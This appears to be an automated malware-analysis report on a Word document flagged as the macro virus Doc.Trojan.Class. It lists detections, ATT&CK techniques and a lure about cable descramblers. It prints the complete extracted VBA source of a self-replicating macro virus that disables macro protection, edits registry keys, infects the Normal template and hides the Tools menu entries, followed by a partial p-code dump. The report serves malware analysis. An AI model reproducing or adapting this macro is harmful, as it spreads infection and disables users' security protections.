MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including AutoOpen and AutoClose, which are commonly used to execute malicious code upon document opening or closing. The script attempts to disable macro virus protection and modify registry keys related to Office options, likely to ensure its execution and persistence. The document body is a lure for purchasing cable descramblers, suggesting a scam or fraudulent activity.
Heuristics 5
-
ClamAV: Doc.Trojan.Class-39 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Class-39
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6732 bytes |
SHA-256: b2ca2299c8386494a18cb423b919d7c1f8cc3343170762a067b0888959ede047 |
|||
|
Detection
ClamAV:
Doc.Trojan.Class-26
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error GoTo zippy
Options.VirusProtection = Chr(48): Options.SaveNormalPrompt = Chr(48): Options.ConfirmConversions = Chr(48): x = 0: o = 0
rt = ActiveDocument.VBProject.VBComponents.Item(Abs(1)).codemodule.countoflines
st = NormalTemplate.VBProject.VBComponents.Item(Abs(1)).codemodule.countoflines
If st > 0 And rt > 0 Then GoTo zippy
If st = 0 Then
Set rl = NormalTemplate.VBProject.VBComponents
Set hst = ActiveDocument.VBProject.VBComponents
If Month(Now()) > 1 And Day(Now()) = 15 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\Word.Document.8", "") = "It's Zippy!"
hst.Item(Abs(1)).Name = rl.Item(Abs(1)).Name
hst.Item(Abs(1)).Export Application.StartupPath & System.Version
End If
If rt = 0 Then Set rl = ActiveDocument.VBProject.VBComponents
rl.Item(Abs(1)).codemodule.AddFromFile Application.StartupPath & System.Version
With rl.Item(Abs(1)).codemodule
For j = Chr(49) To Chr(52)
.deletelines Chr(49)
Next j
End With
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") = "0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") = "0"
If st = 0 Then CommandBars("tools").Controls("Macro").Delete
If st = 0 Then CommandBars("tools").Controls("Options...").Delete
If st = 0 Then rl.Item(Abs(1)).codemodule.replaceline 1, "Sub AutoClose()"
If st = 0 And rt = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
zippy:
If st <> 0 And rt = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub 'WM97/Zippy by Virus :) Smile
' Processing file: /opt/analyzer/scan_staging/32a4ec870a944d32a231d193de0331eb.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3390 bytes
' Line #0:
' FuncDefn (Sub AutoOpen())
' Line #1:
' OnError zippy
' Line #2:
' LitDI2 0x0030
' ArgsLd Chr 0x0001
' Ld Options
' MemSt VirusProtection
' BoS 0x0000
' LitDI2 0x0030
' ArgsLd Chr 0x0001
' Ld Options
' MemSt SaveNormalPrompt
' BoS 0x0000
' LitDI2 0x0030
' ArgsLd Chr 0x0001
' Ld Options
' MemSt ConfirmConversions
' BoS 0x0000
' LitDI2 0x0000
' St x
' BoS 0x0000
' LitDI2 0x0000
' St o
' Line #3:
' LitDI2 0x0001
' FnAbs
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd codemodule
' MemLd countoflines
' St rt
' Line #4:
' LitDI2 0x0001
' FnAbs
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd codemodule
' MemLd countoflines
' St st
' Line #5:
' Ld st
' LitDI2 0x0000
' Gt
' Ld rt
' LitDI2 0x0000
' Gt
' And
' If
' BoSImplicit
' GoTo zippy
' EndIf
' Line #6:
' Ld st
' LitDI2 0x0000
' Eq
' IfBlock
' Line #7:
' SetStmt
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' Set rl
' Line #8:
' SetStmt
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' Set hst
' Line #9:
' ArgsLd Now 0x0000
' ArgsLd Month 0x0001
' LitDI2 0x0001
' Gt
' ArgsLd Now 0x0000
' ArgsLd Day 0x0001
' LitDI2 0x000F
' Eq
' And
' If
' BoSImplicit
' LitStr 0x000B "It's Zippy!"
' LitStr 0x0000 ""
' LitStr 0x0021 "HKEY_CLASSES_ROOT\Word.Document.8"
' LitStr 0x0000 ""
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' EndIf
' Line #10:
' LitDI2 0x0001
' FnAbs
' Ld rl
' ArgsMemLd Item 0x0001
' MemLd New
' LitDI2 0x0001
' FnAbs
' Ld hst
' ArgsMemLd Item 0x0001
' MemSt New
' Line #11:
' Ld Application
' MemLd StartupPath
' Ld System
' MemLd Version
' Concat
' LitDI2 0x0001
' FnAbs
' Ld hst
' ArgsMemLd Item 0x0001
' ArgsMemCall Export 0x0
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.